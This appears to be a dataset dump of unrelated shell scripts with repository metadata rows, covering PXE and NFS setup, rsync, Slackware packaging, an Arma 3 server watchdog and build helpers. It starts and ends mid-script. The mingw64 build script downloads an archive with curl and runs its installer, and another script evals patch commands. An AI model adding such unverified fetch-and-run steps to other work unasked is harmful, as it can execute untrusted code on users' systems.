IPs=`resolvename $dst_addr`
for dst_ip in $IPs; do
strip_from_table $dst_ip
done
fi
# Show progress
echo -en "\rProcessing ($CNT/$CNT_ALL): $dst_addr\e[K\e[0m"
let CNT++
done <<< "$ADDRESS_LIST"
echo -en "\r\e[K\e[0m"
# Strip routes of myself.
ROUTE_TABLE=$( sed -e '/^default via/d' \
-e '/scope host/d' \
-e '/dev lo $/d' \
-e '/scope link/d' <<< "$ROUTE_TABLE" )
if [[ $ROUTE_TABLE ]]; then
# echo "Routes to clean:"
echo "$ROUTE_TABLE"
echo -n "${YELLOW_BOLD}Routes above will be deleted, OK?${OFF} (yes/no/quit) "
yes_or_no || exit 0
while read R; do
if ip route del $R; then
log "$ACTION: $R"
else
log "$ACTION failed: $R"
echo "${RED_BOLD}fail to delete${OFF}: $R"
fi
done <<< "$ROUTE_TABLE"
else
echo_green "Great, nothing to clean :)"
fi
;;
*)
print_help
esac
| true
|
801fbf2269952e2965b37002fe04ea285a42f3c8
|
Shell
|
byteorgshiva/scripts
|
/update-kindle-work-first.sh
|
UTF-8
| 552
| 2.53125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#FROM=/cygdrive/c/cygwin64/home/RKurr/BitTorrentSync/Todd/mobi/
#FROM=/cygdrive/i/BitTorrenSync/Todd/mobi/
#FROM=/cygdrive/i/BitTorrenSync/Todd\ Books/Apps/
FROM=/cygdrive/d/BitTorrent\ Sync/Apps/
TO=/cygdrive/e/documents/transparent-language
CMD="rsync --verbose --recursive --checksum --delete --prune-empty-dirs --human-readable --progress --itemize-changes --exclude='Packet Publishing/' --exclude='Free and Not Updated O?Reilly Books/' --include='*/' --include='[0-9A-Ll]*.mobi' --exclude='*' '$FROM' '$TO'"
echo eval $CMD
eval $CMD
| true
|
0aee24eec4d6fe5c56c9c7d43a3a89711f406036
|
Shell
|
6donote4/debian-scripts
|
/OTHER/pxec.sh
|
UTF-8
| 4,540
| 3.6875
| 4
|
[] |
no_license
|
#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
#========================================
# Linux Distribution: Manjaro/Debian 8+/
# Author: 6donote4 <mailto:do_note@hotmail.com>
# Dscription: Config pxe server for openwrt.
# Version: 0.0.1
# Blog: https://www.donote.tk https://6donote4.github.io
#========================================
# This script is used to config pxe server for openwrt.
VERSION=0.0.1
PROGNAME="$(basename $0)"
export LC_ALL=C
SCRIPT_UMASK=0122
umask $SCRIPT_UMASK
usage() {
cat << EOF
pxec.sh $VERSION
Usage:
./$PROGNAME [option]
Options
-i Initialization
-s Start configuartion
-d dnsmasq settings
-n nfs-server settings
--version Show version
-h --help Show this usage
EOF
}
red='\033[0;31m'
green='\033[0;32m'
yellow='\033[0;33m'
plain='\033[0m'
if [[ "$1" == "" ]];then
usage
exit 0
fi
Init() {
mkdir -p /mnt/PXEboot/OS/linux
#mkdir -p /mnt/media
read -p "Please input nfs server address:" NFS_ADDR
echo "nfs server address: $NFS_ADDR"
showmount -e $NFS_ADDR #nfs-server nfs-client nfs-utils
read -p "Please input nfs path:" NFS_PATH
echo "nfs path:$NFS_PATH"
# mount.nfs $NFS_ADDR:$NFS_PATH /mnt/media
mount.nfs $NFS_ADDR:$NFS_PATH /mnt/PXEboot/OS/linux
}
pxeboot() {
# wget https://www.kernel.org/pub/linux/utils/boot/syslinux/syslinux-6.03.tar.xz
# 下载syslinux软件包
# tar -xf syslinux-6.03.tar.xz
# 解压
cd syslinux-6.03/
# 进入该目录,下面复制一堆文件到U盘的PXE启动目录中
# 这一块是BIOS启动文件
mkdir -p /mnt/PXEboot/bios
cp ./bios/core/pxelinux.0 /mnt/PXEboot/bios/
cp ./bios/com32/elflink/ldlinux/ldlinux.c32 /mnt/PXEboot/bios/
cp ./bios/com32/lib/libcom32.c32 /mnt/PXEboot/bios/
cp ./bios/com32/libutil/libutil.c32 /mnt/PXEboot/bios/
cp ./bios/com32/menu/vesamenu.c32 /mnt/PXEboot/bios/
# 然后是UEFI启动文件(我用的是64位 UEFI启动文件)
mkdir -p /mnt/PXEboot/uefi
cp efi64/efi/syslinux.efi /mnt/PXEboot/uefi/
cp efi64/com32/elflink/ldlinux/ldlinux.e64 /mnt/PXEboot/uefi/
cp efi64/com32/menu/vesamenu.c32 /mnt/PXEboot/uefi/
cp efi64/com32/lib/libcom32.c32 /mnt/PXEboot/uefi/
cp efi64/com32/libutil/libutil.c32 /mnt/PXEboot/uefi/
}
cfgfile() {
mkdir -p /mnt/PXEboot/pxelinux.cfg/
# 在PXE启动目录下面新建cfg目录
read -p "Please input OS label:" LABEL
read -p "Please input OS path(/mnt/PXEboot/OS/linux):" OPATH
ls $OPATH
read -p "Please input Root directory:" ROOT_DIR
read -p "Please input OS kernel name: " KNAME
read -p "Please input OS initrd name: " INAME
read -p "Please input PXE server address: " PADDR
read -p "Please input boot initrd name:" INITRDB
echo "label:$LABEL"
echo "kernel root/name:$ROOT_DIR/$KNAME"
echo "initrd root/name:$ROOT_DIR/$INAME"
echo "PXE server address:$PADDR"
echo "boot initrd name: $INITRDB"
cat <<EOF > /mnt/PXEboot/pxelinux.cfg/default
# 新建文件,写入以下内容
DEFAULT vesamenu.c32
MENU TITLE My PXEboot Server
PROMPT 0
TIMEOUT 100
label $LABEL amd64
KERNEL OS/linux/$ROOT_DIR/$KNAME
INITRD OS/linux/$ROOT_DIR/$INAME
APPEND netboot=nfs nfsroot=$PADDR:/mnt/PXEboot/OS/linux/$ROOT_DIR boot=$INITRDB quiet splash --
EOF
cd /mnt/PXEboot/bios
ln -s ../pxelinux.cfg/
ln -s ../OS/
cd -
cd /mnt/PXEboot/uefi
ln -s ../pxelinux.cfg/
ln -s ../OS/
}
dhcpsettings() {
cat >> /etc/dnsmasq.conf <<EOF
# filename: /etc/dnsmasq.conf
# 在最后添加以下几行,这里会根据client类型自动选择镜像
enable-tftp
tftp-root=/mnt/PXEboot
dhcp-boot=bios/pxelinux.0
dhcp-match=set:efi-x86_64,option:client-arch,7
dhcp-boot=tag:efi-x86_64,uefi/syslinux.efi
# enable dhcp
# dhcp-range=192.168.2.10,192.168.2.200,12h
# dhcp-option=3,192.168.2.254
# dhcp-option=option:dns-server,114.114.114.114,119.29.29.29
# disable dns
port=0
EOF
/etc/init.d/dnsmasq restart
}
nfs_server_settings () {
cat >> /etc/exports <<EOF
/mnt *(ro,all_squash,insecure,sync)
EOF
/etc/init.d/nfsd restart
}
main() {
pxeboot
cfgfile
}
ARGS=( "$@" )
case "$1" in
-i)
Init
echo "done"
exit 0
;;
-s)
main
echo "done"
exit 0
;;
-d)
dhcpsettings
echo "done"
;;
-n)
nfs_server_settings
echo "done"
;;
-h|--help)
usage
exit 0
;;
--version)
echo $VERSION
exit 0
;;
*)
echo "Invalid parameter $1" 1>&2
exit 1
;;
esac
| true
|
99c835e8918f5d9693b1cd9c3294724f10e1c8d5
|
Shell
|
near-feign/pcapdb
|
/core/runserver
|
UTF-8
| 242
| 3.28125
| 3
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
HTTP_PORT=$(grep ^http_port ../etc/pcapdb.cfg | awk -F= '{{ print $2 }}' | tr -d '[[:space:]]')
if [ -z "${HTTP_PORT}" ]; then
URI=$(hostname)
else
URI=$(hostname):${HTTP_PORT}
fi
../bin/python manage.py runserver ${URI}
| true
|
ec0ed5a8aa32d1d1e00b64834ea0135d069e352e
|
Shell
|
vaibhav016/FILRCN
|
/scripts/create_transcripts_from_data.sh
|
UTF-8
| 1,429
| 2.71875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
echo "This will create transcripts for you, Kindly change the datapaths accordingly"
INPUT_DIR_1="Datasets/train-clean-100/LibriSpeech/train-clean-100"
OUTPUT_FILE="Datasets/train-clean-100/LibriSpeech/transcripts.tsv"
python3 create_librispeech_trans.py -d $INPUT_DIR_1 $OUTPUT_FILE
INPUT_DIR_1="Datasets/dev-clean/LibriSpeech/dev-clean"
OUTPUT_FILE="Datasets/dev-clean/LibriSpeech/transcripts.tsv"
python3 create_librispeech_trans.py -d $INPUT_DIR_1 $OUTPUT_FILE
INPUT_DIR_1="Datasets/dev-other/LibriSpeech/dev-other"
OUTPUT_FILE="Datasets/dev-other/LibriSpeech/transcripts.tsv"
python3 create_librispeech_trans.py -d $INPUT_DIR_1 $OUTPUT_FILE
INPUT_DIR_1="Datasets/test-clean/LibriSpeech/test-clean"
OUTPUT_FILE="Datasets/test-clean/LibriSpeech/transcripts.tsv"
python3 create_librispeech_trans.py -d $INPUT_DIR_1 $OUTPUT_FILE
INPUT_DIR_1="Datasets/train-clean-360/LibriSpeech/train-clean-360"
OUTPUT_FILE="Datasets/train-clean-360/LibriSpeech/transcripts.tsv"
python3 create_librispeech_trans.py -d $INPUT_DIR_1 $OUTPUT_FILE
INPUT_DIR_1="Datasets/train-other-500/LibriSpeech/train-other-500"
OUTPUT_FILE="Datasets/train-other-500/LibriSpeech/transcripts.tsv"
python3 create_librispeech_trans.py -d $INPUT_DIR_1 $OUTPUT_FILE
INPUT_DIR_1="Datasets/test-other/LibriSpeech/test-other"
OUTPUT_FILE="Datasets/test-other/LibriSpeech/transcripts.tsv"
python3 create_librispeech_trans.py -d $INPUT_DIR_1 $OUTPUT_FILE
| true
|
89ad49821175b9b86088eaafe6e092504a70d319
|
Shell
|
mmalter/widukind-docker
|
/redis-docker/docker-entrypoint.sh
|
UTF-8
| 304
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
sysctl -w net.core.somaxconn=65535
sysctl -w vm.overcommit_memory=1
[ -f /sys/kernel/mm/transparent_hugepage/enabled ] && echo never > /sys/kernel/mm/transparent_hugepage/enabled
if [ "$1" = 'redis-server' ]; then
chown -R redis .
exec gosu redis "$@"
fi
exec "$@"
| true
|
c177229d96bf647554cfd247a20d20f3b9d2ae55
|
Shell
|
kukrimate/toolchain
|
/src/prepare
|
UTF-8
| 866
| 4.15625
| 4
|
[
"ISC"
] |
permissive
|
#!/bin/sh
# Exit on error
set -e
# download and check a file
download_file() {
FILE=`basename $1`
if [ ! -f $FILE ]; then
curl -L $1 > $FILE
else
echo "$FILE already exists"
fi
if [ x"$2" != x`sha256sum $FILE | cut -d ' ' -f 1` ]; then
echo "SHA256 mismatch for $FILE" >&2
exit 1
fi
}
# check if clean is requested
for arg in "$@"; do
case "$arg" in
-c|--clean) do_clean=yes ;;
esac
done
# check if curl is installed
if [ ! -x `command -v curl` ]; then
echo "Please install curl" >&2
exit 1
fi
parse_src() {
source $1
FILE=`basename $URL`
if [ ! -f $FILE ]; then
curl -L $URL > $FILE
fi
NAME=`basename $1`-$VER
if [ ! -d $NAME ]; then
tar xf $FILE
cd $NAME
for p in "${PATCHES[@]}"; do
eval "$p"
done
cd ..
fi
}
for s in `ls list`; do
if [ x$do_clean = xyes ]; then
rm -rf $s*
else
parse_src list/$s
fi
done
| true
|
23172345c6df02c86783dd587741cbb215785357
|
Shell
|
kuedan/Debian-Live-config
|
/webconverger/config/includes.chroot/etc/init.d/webconverger
|
UTF-8
| 3,167
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
### BEGIN INIT INFO
# Provides: webconverger
# Required-Start: $local_fs $remote_fs
# Required-Stop: $remote_fs
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Webconverger Live environment setup
### END INIT INFO
# PATH should only include /usr/* if it runs after the mountnfs.sh script
PATH=/sbin:/usr/sbin:/bin:/usr/bin
NAME="webconverger"
DESC="Webconverger live environment"
SCRIPTNAME=/etc/init.d/$NAME
WEBCHOME=/home/webc
# Read configuration variable file if it is present
[ -r /etc/default/$NAME ] && . /etc/default/$NAME
. /etc/webc/webc.conf
# Make sure we use a default closeicon
cmdline | grep -qs "closeicon=" || $WEBCHOME/iwcloseconfig.sh strip
# Ensure volume is 100%
amixer -s &>/dev/null <<END
set Master 100% unmute
set Master Front 100% unmute
END
cat >> /etc/X11/xorg.conf <<WCEND
# Webconverger.com options to disable X options to break out of X
Section "ServerFlags"
Option "AllowMouseOpenFail"
Option "HandleSpecialKeys" "Never"
Option "DontZoom" "true"
Option "DontZap" "true"
Option "DontVTSwitch" "true"
EndSection
WCEND
for x in $(cmdline)
do
case $x in
homepage=*)
set -f -- $(/bin/busybox httpd -d ${x#homepage=})
if test "$1"
then
export HOMEPAGE=$1
else
export HOMEPAGE="http://portal.webconverger.com/"
fi
x=$1
shift
if test -e /etc/iceweasel/profile/prefs.js
then
echo "user_pref(\"browser.startup.homepage\", \"$x\");" >> /etc/iceweasel/profile/prefs.js
fi
;;
closeicon=*) # For controling the close icons in iceweasel
$WEBCHOME/iwcloseconfig.sh ${x#closeicon=}
;;
webcchrome=*) # To configure the chrome settings
$WEBCHOME/iwchromeconfig.sh ${x#webcchrome=}
;;
wpa-*)
# http://anonscm.debian.org/viewvc/pkg-wpa/wpasupplicant/trunk/debian/README.Debian?view=markup
wirelesscfg="${wirelesscfg}$(/bin/busybox httpd -d "${x/=/ }")\n\t"
;;
http_proxy=*)
# http://developer.mozilla.org/en/docs/Mozilla_Networking_Preferences#Proxy
export HTTP_PROXY=${x#http_proxy=}
HOST_PORT=${HTTP_PROXY##*//}
PROXY_HOST=${HOST_PORT%%:*}
PROXY_PORT=${HOST_PORT##*:}
logger PROXY SETTINGS: $HTTP_PROXY $PROXY_HOST $PROXY_PORT
test -e /etc/iceweasel/profile/prefs.js &&
echo "user_pref(\"network.proxy.type\", 1);" >> /etc/iceweasel/profile/prefs.js
echo "user_pref(\"network.proxy.http\", \"$PROXY_HOST\");" >> /etc/iceweasel/profile/prefs.js
echo "user_pref(\"network.proxy.http_port\", $PROXY_PORT);" >> /etc/iceweasel/profile/prefs.js
echo "user_pref(\"network.proxy.ssl\", \"$PROXY_HOST\");" >> /etc/iceweasel/profile/prefs.js
echo "user_pref(\"network.proxy.ssl_port\", $PROXY_PORT);" >> /etc/iceweasel/profile/prefs.js
;;
esac
done
# Don't try setup wireless if there is no config or we have a working internet connection
if test -z "$wirelesscfg"
then
exit 0
fi
sed -i "s,wireless config,$wirelesscfg,g" /etc/network/interfaces
for iface in wlan0 eth1 # for want of a better way of detecting wireless interfaces
do
ping -c 1 google.com && break # If the network works, don't touch it
/sbin/ifconfig $iface &> /dev/null || continue # if the device does not exist, skip!
ifup $iface
done
:
| true
|
4d5f52758a665f8f700fbaa38aeaa34bb5c983ba
|
Shell
|
davidandreoletti/dotfiles
|
/install/utils/debug.sh
|
UTF-8
| 309
| 2.953125
| 3
|
[] |
no_license
|
###############################################################################
# Debug related functions
###############################################################################
is_debug_on() {
env | grep -q "^DEBUG=";
return $?
}
is_debug_off() {
is_debug_on && return 1
return 0
}
| true
|
e6da0b4a685e0c70f1d868eaec94e8f3e6b5258e
|
Shell
|
dhabyx/slackbuilds
|
/newPackage.sh
|
UTF-8
| 2,803
| 3.78125
| 4
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/bash
# Script helper for make slackbuild directory structure
# Copyright 2015 Dhaby Xiloj <slack.dhabyx@gmail.com>
# All rights reserved.
#
# Redistribution and use of this script, with or without modification, is
# permitted provided that the following conditions are met:
#
# 1. Redistributions of this script must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# path to templates dir
CWD=$(pwd)
TMPL_PATH="$CWD/templates"
AUTHOR="Dhaby Xiloj"
YEAR=$(date +%Y)
EMAIL="slack.dhabyx@gmail.com"
COUNTRY=""
ALIAS="DhabyX"
function displayHelp {
cat << EOF
Usage:
$0 package_name [template]
Available templates:
autotools (default)
cmake
python
perl
rubygem
EOF
exit
}
if [ $# -lt 1 ] || [ $# -gt 2 ]; then
displayHelp
fi
TMPL_NAME=""
if [ $# -eq 1 ]; then
if [ "$1" == "-h" ] || [ "$1" == "--help" ]; then
displayHelp
fi
TMPL_NAME="autotools"
else
TMPL_NAME=$2
fi
PKG_NAME=$1
TMPL_FILE="$TMPL_PATH/$TMPL_NAME-template.SlackBuild"
if [ ! -f $TMPL_FILE ]; then
echo "ERROR: template not found."
echo
displayHelp
fi
if [ -d "$CWD/$PKG_NAME" ]; then
echo "ERROR: $PKG_NAME package directory structure already exists."
exit
fi
mkdir $CWD/$PKG_NAME
# copy standard files
cp $TMPL_PATH/{doinst.sh,README} \
$CWD/$PKG_NAME
# edit variables in SlackBuild file
sed "s/\(<appname>\|appname\)/$PKG_NAME/g; \
s/<year>/$YEAR/; s/<you>/$AUTHOR/; \
s/<where you live>/<$EMAIL>/" \
$TMPL_FILE > $CWD/$PKG_NAME/$PKG_NAME.SlackBuild
# edit and clean slack-desc file
head -"$[$(awk '/appname/{ print NR; exit }' $TMPL_PATH/slack-desc)+1]" \
$TMPL_PATH/slack-desc | sed "s/appname/$PKG_NAME/g" > $CWD/$PKG_NAME/slack-desc
for i in {1..9}; do
tail -1 $CWD/$PKG_NAME/slack-desc >> $CWD/$PKG_NAME/slack-desc
done
cat $TMPL_PATH/template.info | \
sed 's/".*"/""/' | \
sed 's/MAINTAINER=""/MAINTAINER="'$ALIAS'"/' | \
sed 's/EMAIL=""/EMAIL="'$EMAIL'"/' | \
sed 's/PRGNAM=""/PRGNAM="'$PKG_NAME'"/' > $CWD/$PKG_NAME/$PKG_NAME.info
| true
|
059e67bb685d39f0338ebd29238698c7e290356d
|
Shell
|
ssoudan/pyGP
|
/BUILD.sh
|
UTF-8
| 451
| 3.671875
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -e
function build() {
cmd=$1
c=${cmd/_}
container=${c/.py/}
if [ ! -e "src/main/python/$cmd" ]; then
echo "[E] invalid command: $cmd"
exit 1
fi
docker build --build-arg cmd=${cmd} -t pygp-${container} .
}
#
# main-like
#
cmd=${1:-all}
if [ "all" != "$cmd" ];
then
build $cmd
else
for cmd in run_gpflow.py run_bo.py run_sklearn.py run_tfp.py
do
build $cmd
done
fi
echo "[I] OK"
| true
|
4b42ed932299393a660db6650bd13ddb949405d8
|
Shell
|
erbth/tslegacy
|
/ncurses/install_split.sh
|
UTF-8
| 1,288
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
set -e
function install_licensing_info
{
install -dm755 $1/usr/share/doc/$2
cp ${BUILD_DIR}/${SRC_DIR}/COPYING $1/usr/share/doc/$2
}
# Clean the packaging target
declare -a PKG_DIRS
for DIR in ${PACKAGING_LOCATION}/{ncurses,ncurses-${ncurses_ABI},ncurses-dev}/${DESTDIR}
do
PKG_DIRS+=($DIR)
rm -rf ${DIR}/*
done
# Install and adapt the package
rm -rf ${INSTALL_DIR}/target/*
install -dm755 ${INSTALL_DIR}/target
cd ${BUILD_DIR}/${SRC_DIR}
make DESTDIR=${INSTALL_DIR}/target install
cd ${INSTALL_DIR}/target
bash ../adapt.sh
# ncurses
install -dm755 ${PKG_DIRS[0]}/usr/{lib,share}
mv ${INSTALL_DIR}/target/usr/bin ${PKG_DIRS[0]}/usr/
mv ${INSTALL_DIR}/target/usr/share/{tabset,terminfo} ${PKG_DIRS[0]}/usr/share/
mv ${INSTALL_DIR}/target/usr/lib/terminfo ${PKG_DIRS[0]}/usr/lib/
install_licensing_info ${PKG_DIRS[0]} ncurses
# ncurses-<ABI>
install -dm755 ${PKG_DIRS[1]}/usr/lib
mv ${INSTALL_DIR}/target/lib ${PKG_DIRS[1]}/
mv ${INSTALL_DIR}/target/usr/lib/{libformw.so.*,libmenuw.so.*,libpanelw.so.*} \
${PKG_DIRS[1]}/usr/lib/
install_licensing_info ${PKG_DIRS[1]} ncurses-${ncurses_ABI}
# ncurses-dev
mv ${INSTALL_DIR}/target/usr ${PKG_DIRS[2]}/
mv ${PKG_DIRS[2]}/usr/share/doc/ncurses{,-dev}
install_licensing_info ${PKG_DIRS[2]} ncurses-dev
| true
|
5c140d92a927d98500ca20e8bad25c5cf2d280c7
|
Shell
|
bsrushti/bin_files
|
/find.sh
|
UTF-8
| 130
| 2.984375
| 3
|
[] |
no_license
|
#! /bin/bash
keyWord=$1;
grep $keyWord -r * > filePaths
path=`cat filePaths | cut -d':' -f1 | sort -u `
echo $path | tr ' ' '\n'
| true
|
f20d394578cce61df8c282070340ad13fd984af0
|
Shell
|
ox3e223c/toolkit
|
/screen/hyperpixel4/etc/rc.local
|
UTF-8
| 1,481
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
# Print the IP address
_IP=$(hostname -I) || true
if [ "$_IP" ]; then
printf "My IP address is %s\n" "$_IP"
fi
# Check to see if HDMI display is connected.
_HDMI_EXISTS=$(tvservice -l | grep "HDMI" ) || true
# Is device in LCD mode?
_ISLCD=$(tvservice -s | grep "LCD") || true
if [ -z "$_HDMI_EXISTS" ]; then
if [ "$_ISLCD" ]; then
echo "[ \e[32mOK\e[39m ] NO HDMI connected, Hyperpixel display config already active\n"
#do nothing
else
echo "[\e[91mFAILED\e[39m] NO HDMI connected, switching to Hyperpixel config\n"
#change config to Hyperpixel and reboot since no display detected
sudo cp /boot/hyper-config.txt /boot/config.txt
sudo reboot
fi
else
if [ "$_ISLCD" ]; then
echo "[\e[91mFAILED\e[39m] HDMI is connected, but Hyperpixel config is being used\n"
#we need to switch to HDMI display config and reboot
sudo cp /boot/hdmi-config.txt /boot/config.txt
sudo reboot
else
echo "[ \e[32mOK\e[39m ] HDMI is connected, HDMI config detected, so turning off LCD BL\n"
#we need to shut off the GPIO backlight on the Hyperpixel display since we aren't using it
gpio -g mode 19 out
gpio -g write 19 0
fi
fi
exit 0
| true
|
250385a7dc126992ab7ba5f9fffe11b27d702051
|
Shell
|
sbobovyc/ARMA
|
/server/arma3serverscript
|
UTF-8
| 3,038
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/bash
#=======================================================================
#======== CONFIGURATION PARAMETERS ========
#======== MUST BE EDITED MANUALLY TO FIT YOUR SYSTEM PARAMETERS ========
#=======================================================================
ARMA_DIR=/media/storage/Arma3
CFG=basic.cfg
CONFIG=server.cfg
PORT=2302
PIDFILE=${ARMA_DIR}/${PORT}.pid
RUNFILE=${ARMA_DIR}/${PORT}.run
LOGFILE=${ARMA_DIR}/log.${PORT}.txt
SERVER=${ARMA_DIR}/arma3server
#OTHERPARAMS=
#OTHERPARAMS=-cpucount=4
#OTHERPARAMS="-cpucount=4 -mod=@cba_a3;@cup_terrains_core;@cup_terrains_maps;@cup_weapons;@rhsafrf;@rhsusaf;@nato_rus_vehicle;@isc"
OTHERPARAMS="-cpucount=4 -mod=@rhsafrf;@rhsgref"
#=======================================================================
ulimit -c 1000000
case "$1" in
start)
if [ -f ${RUNFILE} ]; then
$0 stop
fi
echo "Starting ArmA 3 server..."
# file to mark we want server running...
echo "go" >${RUNFILE}
# launch the background watchdog process to run the server
nohup </dev/null >/dev/null $0 watchdog &
;;
stop)
echo "Stopping ArmA 3 server..."
if [ -f ${RUNFILE} ]; then
# ask watcher process to exit by deleting its runfile...
rm -f ${RUNFILE}
fi
# and terminate ArmA 3 server process
if [ -f ${PIDFILE} ]; then
kill -TERM $(< ${PIDFILE})
if [ -f ${PIDFILE} ]; then
rm -f ${PIDFILE}
fi
fi
;;
status)
if [ -f ${RUNFILE} ]; then
echo "Server should be running..."
else
echo "Server should not be running..."
fi
if [ -f ${PIDFILE} ]; then
PID=$(< ${PIDFILE})
echo "PID file exists (PID=${PID})..."
if [ -f /proc/${PID}/cmdline ]; then
echo "Server process seems to be running..."
fi
fi
;;
check)
echo -n "ArmA 3 directory: ${ARMA_DIR} "
if [ -d ${ARMA_DIR} ]; then
echo "OK"
else
echo "MISSING!"
fi
echo -n "Server executable: ${SERVER} "
if [ -x ${SERVER} ]; then
echo "OK"
else
echo "ERROR!"
fi
echo "Port number: ${PORT}"
echo -n "Config file: ${CONFIG} "
if [ -f ${CONFIG} ]; then
echo "OK"
else
echo "MISSING!"
fi
echo -n "Basic config file: ${CFG} "
if [ -f ${CFG} ]; then
echo "OK"
else
echo "MISSING!"
fi
echo "PID file: ${PIDFILE}"
echo "RUN file: ${RUNFILE}"
;;
restart)
$0 stop
$0 start
;;
watchdog)
# this is a background watchdog process. Do not start directly
while [ -f ${RUNFILE} ]; do
# launch the server...
cd ${ARMA_DIR}
echo >>${LOGFILE} "WATCHDOG ($$): [$(date)] Starting server (port ${PORT})..."
${SERVER} >>${LOGFILE} 2>&1 -server -config=${CONFIG} -cfg=${CFG} -port=${PORT} -pid=${PIDFILE} ${OTHERPARAMS}
if [ -f ${RUNFILE} ]; then
echo >>${LOGFILE} "WATCHDOG ($$): [$(date)] Server died, waiting to restart..."
sleep 5s
else
echo >>${LOGFILE} "WATCHDOG ($$): [$(date)] Server shutdown intentional, watchdog terminating"
fi
done
;;
*)
echo "$0 (start|stop|restart|status|check)"
;;
esac
| true
|
94a4cb66521253defb3999f330f5c8834a5b023b
|
Shell
|
Chadi7781/pinned-git
|
/bin/pin-existing-git
|
UTF-8
| 1,046
| 3.6875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Usage: pin-existing-git */.git
GIT=/usr/bin/git
SELF=$(dirname "$(readlink -f -- "$0")")
SHARE=$(readlink -f -- "$SELF/../share/pinned-git")
set-pin() {
local git_dir=$1
local cert_name=$2
shift
shift
echo "Pinning $git_dir -> $cert_name"
"$GIT" "--git-dir=$git_dir" config http.sslcapath "$SHARE/empty-dir"
"$GIT" "--git-dir=$git_dir" config http.sslcainfo "$SHARE/certs/${cert_name}.crt"
}
for dir in "$@"; do
if grep -q 'url = https://github.com/' "$dir/config"; then
set-pin "$dir" github.com
elif grep -q 'url = https://gitlab.com/' "$dir/config"; then
set-pin "$dir" gitlab.com
elif grep -q 'url = https://anonscm.debian.org/' "$dir/config"; then
set-pin "$dir" anonscm.debian.org
elif grep -q 'url = https://salsa.debian.org/' "$dir/config"; then
set-pin "$dir" salsa.debian.org
elif grep -q 'url = https://git.kernel.org/' "$dir/config"; then
set-pin "$dir" git.kernel.org
elif grep -q 'url = https://repo.or.cz/' "$dir/config"; then
set-pin "$dir" repo.or.cz
fi
done
| true
|
fcbb98175344debb557bbfda22c92fdb8d3bafe8
|
Shell
|
dune-universe/dune-universe
|
/packages/ocamlformat.0.19.0/tools/build-mingw64.sh
|
UTF-8
| 897
| 3.40625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Script to build `ocamlformat' under Windows, using the `mingw64' toolchain.
# All it requires is a standard Cygwin installation with the `mingw64'
# toolchain.
set -euo pipefail
opam_url=https://github.com/fdopen/opam-repository-mingw/releases/download/0.0.0.2/opam64.tar.xz
opam_archive=$(basename ${opam_url})
build_dir=_build-mingw64
mkdir -p ${build_dir}
cd ${build_dir}
[ -f ${opam_archive} ] || curl -O -L ${opam_url}
[ -d opam64 ] || tar xf ${opam_archive}
[ -f bin/opam.exe ] || bash opam64/install.sh --prefix $(pwd)
export PATH=$(pwd)/bin:${PATH}
export OPAMROOT="$(cygpath -aml _opam)"
opam init default "https://github.com/fdopen/opam-repository-mingw.git#opam2" -c "ocaml-variants.4.12.0+mingw64c" --disable-sandboxing --no-setup
eval $(opam env)
cd ..
set +eu
opam install -y --deps-only ./ocamlformat.opam
set -eu
dune subst
dune build -p ocamlformat
| true
|
e284b9859d50a3b0b95b2841ca745419736a1848
|
Shell
|
vmi/InstallCert
|
/stub.sh
|
UTF-8
| 244
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/sh
self=`which "$0" 2>/dev/null`
test $? != 0 -a -f "$0" && self="./$0"
test "$OSTYPE" = cygwin && self="$(cygpath -am "$self")"
java=java
test -n "$JAVA_HOME" && java="$JAVA_HOME/bin/java"
exec "$java" $JAVA_OPTS -jar $self "$@"
exit 1
| true
|
6e8a0acfce33adceb42059b40f4cc12316a8c016
|
Shell
|
ulimartinez/dotfiles
|
/polybar/scripts/polybar.sh
|
UTF-8
| 236
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash
killall -q polybar
# Wait until the processes have been shut down
while pgrep -x polybar >/dev/null; do sleep 1; done
for i in $(polybar -m | awk -F: '{print $1}'); do MONITOR=$i polybar custom -c ~/.polybar/config & done
| true
|
b5e51533dfbd0fb2e122cc7da8371280da6ed2f4
|
Shell
|
legends-ai/legends.ai-ts
|
/scripts/update_geodata.sh
|
UTF-8
| 272
| 3.375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
ROOT=$(dirname $0)/..
GEODATA=$ROOT/geodata/
if [ ! -d $GEODATA ]; then
